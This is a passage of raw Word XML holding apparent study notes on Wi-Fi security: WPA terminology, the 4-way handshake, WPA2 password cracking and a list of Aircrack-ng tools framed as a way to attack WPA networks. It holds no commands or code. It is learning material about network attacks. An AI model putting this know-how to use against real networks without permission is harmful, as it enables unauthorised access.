        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5935">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Wi-Fi adapter capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08978BFF" w14:textId="383FB399" w:rsidR="00C04E29" w:rsidRPr="005C5935" w:rsidRDefault="00C04E29" w:rsidP="005C5935">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5935">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Packet capture and injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E27301" w14:textId="3A5D4344" w:rsidR="00C04E29" w:rsidRPr="005C5935" w:rsidRDefault="00C04E29" w:rsidP="005C5935">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5935">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WPA and its handshakes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6262BE22" w14:textId="2690827C" w:rsidR="00C04E29" w:rsidRPr="005C5935" w:rsidRDefault="00C04E29" w:rsidP="005C5935">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5935">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WPA-PSK and exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01251737" w14:textId="015AFA65" w:rsidR="00C04E29" w:rsidRPr="005C5935" w:rsidRDefault="00C04E29" w:rsidP="005C5935">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5935">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Rogue Access Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F84BEF" w14:textId="7066D85A" w:rsidR="00C04E29" w:rsidRPr="005C5935" w:rsidRDefault="00C04E29" w:rsidP="005C5935">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5935">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Wordlist generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F491D97" w14:textId="57B4E02E" w:rsidR="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="005C5935">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5935">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WPA Enterprise and exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783029E9" w14:textId="77777777" w:rsidR="00046C6C" w:rsidRPr="005C5935" w:rsidRDefault="00046C6C" w:rsidP="005C5935">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5DCB13" w14:textId="77777777" w:rsidR="0071757B" w:rsidRPr="0071757B" w:rsidRDefault="0071757B" w:rsidP="0071757B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Key Terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4468C1" w14:textId="77777777" w:rsidR="0071757B" w:rsidRPr="0071757B" w:rsidRDefault="0071757B" w:rsidP="0071757B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37736737" w14:textId="11D337AD" w:rsidR="0071757B" w:rsidRPr="0071757B" w:rsidRDefault="0071757B" w:rsidP="0071757B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">SSID: The network "name" that you see when you try and </w:t>
      </w:r>
      <w:r w:rsidR="00664AB6" w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614B7E2C" w14:textId="19D59FCE" w:rsidR="0071757B" w:rsidRPr="0071757B" w:rsidRDefault="0071757B" w:rsidP="0071757B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ESSID: An SSID that *may* apply to multiple access points, </w:t>
      </w:r>
      <w:r w:rsidR="00664AB6" w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>e.g.,</w:t>
      </w:r>
      <w:r w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a company office, normally forming a bigger network. For Aircrack they normally refer to the network you're attacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28344BFB" w14:textId="58940AED" w:rsidR="0071757B" w:rsidRPr="0071757B" w:rsidRDefault="0071757B" w:rsidP="0071757B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>BSSID: An access point MAC (hardware) address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7953A888" w14:textId="11AE49D2" w:rsidR="0071757B" w:rsidRPr="0071757B" w:rsidRDefault="0071757B" w:rsidP="0071757B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA2-PSK: </w:t>
      </w:r>
      <w:r w:rsidR="00664AB6" w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> networks that you connect to by providing a password that's the same for </w:t>
      </w:r>
      <w:r w:rsidR="00664AB6" w:rsidRPr="0071757B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>everyone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19756D22" w14:textId="2D52E4A7" w:rsidR="0071757B" w:rsidRPr="00A85CD3" w:rsidRDefault="0071757B" w:rsidP="00A85CD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA2-EAP: </w:t>
      </w:r>
      <w:r w:rsidR="00664AB6" w:rsidRPr="00A85CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A85CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> networks that you </w:t>
      </w:r>
      <w:r w:rsidR="00664AB6" w:rsidRPr="00A85CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>authenticate</w:t>
      </w:r>
      <w:r w:rsidRPr="00A85CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> by providing a username and password, which is sent to a RADIUS server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B45BD" w14:textId="70BD78DE" w:rsidR="00E62C97" w:rsidRDefault="0071757B" w:rsidP="00922AC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00922AC8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">RADIUS: A server for authenticating clients, not just for </w:t>
      </w:r>
      <w:r w:rsidR="00664AB6" w:rsidRPr="00922AC8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="00922AC8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE548F" w14:textId="1951BF07" w:rsidR="00BB78D7" w:rsidRDefault="00BB78D7" w:rsidP="00437A74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A328E1" w14:textId="10FD47C2" w:rsidR="00983468" w:rsidRDefault="00983468" w:rsidP="00437A74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The core of </w:t>
      </w:r>
      <w:r w:rsidR="00C30DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WPA (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2) authentication is the 4-way handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC02A7" w14:textId="1BCF105F" w:rsidR="00437A74" w:rsidRDefault="00437A74" w:rsidP="00437A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Most home Wi-Fi networks use </w:t>
      </w:r>
      <w:r w:rsidR="00C30DE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WPA (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2) personal</w:t>
      </w:r>
      <w:r w:rsidR="00F36637">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A7C0DC" w14:textId="1B99D454" w:rsidR="00ED2273" w:rsidRDefault="00ED2273" w:rsidP="00ED2273">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2273">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77735841" wp14:editId="0F10BBB4">
            <wp:extent cx="2870791" cy="3248979"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:docPr id="64764022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0226" name="Picture 1" descr="A diagram of a computer system&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2873829" cy="3252417"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="279F201C" w14:textId="539CD5BA" w:rsidR="00B37AEA" w:rsidRDefault="00B35D05" w:rsidP="00B35D05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WPA2’s are difficult to crack, as you’re essentially just spraying passwords into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8CB190" w14:textId="29496BEE" w:rsidR="00CD6B1D" w:rsidRDefault="00CD6B1D" w:rsidP="00B35D05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Time consuming, however you might get lucky. (Realistically though, passwords would not be as easy to crack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A47EF7" w14:textId="77777777" w:rsidR="00A87804" w:rsidRPr="00A87804" w:rsidRDefault="00A87804" w:rsidP="00A87804">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1871F6" w14:textId="6F6B3D12" w:rsidR="00B37AEA" w:rsidRDefault="00B37AEA" w:rsidP="00ED2273">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Aircrack-ng Suite – Capture packets to attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A436AB5" w14:textId="3F2902F8" w:rsidR="00B37AEA" w:rsidRDefault="00B37AEA" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>aircrack-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439CF574" w14:textId="2599BDDE" w:rsidR="00B37AEA" w:rsidRDefault="00B37AEA" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>airdecap-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588806A3" w14:textId="13F7B42C" w:rsidR="00B37AEA" w:rsidRDefault="00B37AEA" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>airmon-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCD31B9" w14:textId="6B72AFF0" w:rsidR="006E4576" w:rsidRDefault="006E4576" w:rsidP="006E4576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Use these to attack WPA </w:t>
      </w:r>
      <w:r w:rsidR="00A918CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5A88BC" w14:textId="76025AC5" w:rsidR="00B37AEA" w:rsidRDefault="00B37AEA" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>aireplay-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5420ECD4" w14:textId="1A809287" w:rsidR="00B37AEA" w:rsidRDefault="00B37AEA" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>airodump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068325D0" w14:textId="35A63EA4" w:rsidR="00B37AEA" w:rsidRDefault="00B37AEA" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>airtun-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A8DC1D" w14:textId="413DE661" w:rsidR="00B37AEA" w:rsidRDefault="00B37AEA" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>packetforge-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7DEE09" w14:textId="65515D1C" w:rsidR="00B37AEA" w:rsidRDefault="00B37AEA" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>airbase-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A12FFF0" w14:textId="500BD1BD" w:rsidR="00B37AEA" w:rsidRDefault="00BB2E0E" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>airdecloak-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176D7275" w14:textId="0FA3664B" w:rsidR="00BB2E0E" w:rsidRDefault="00BB2E0E" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>airolib-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D77399" w14:textId="42EDC150" w:rsidR="00BB2E0E" w:rsidRDefault="00BB2E0E" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>airserv-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36539464" w14:textId="1C55288E" w:rsidR="00BB2E0E" w:rsidRDefault="00BB2E0E" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>buddy-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FF6F21" w14:textId="2AE057A2" w:rsidR="00BB2E0E" w:rsidRDefault="00BB2E0E" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ivstools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A734D20" w14:textId="1B91D911" w:rsidR="00BB2E0E" w:rsidRDefault="00BB2E0E" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>easside-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD3300D" w14:textId="2177B1A2" w:rsidR="00BB2E0E" w:rsidRDefault="00BB2E0E" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
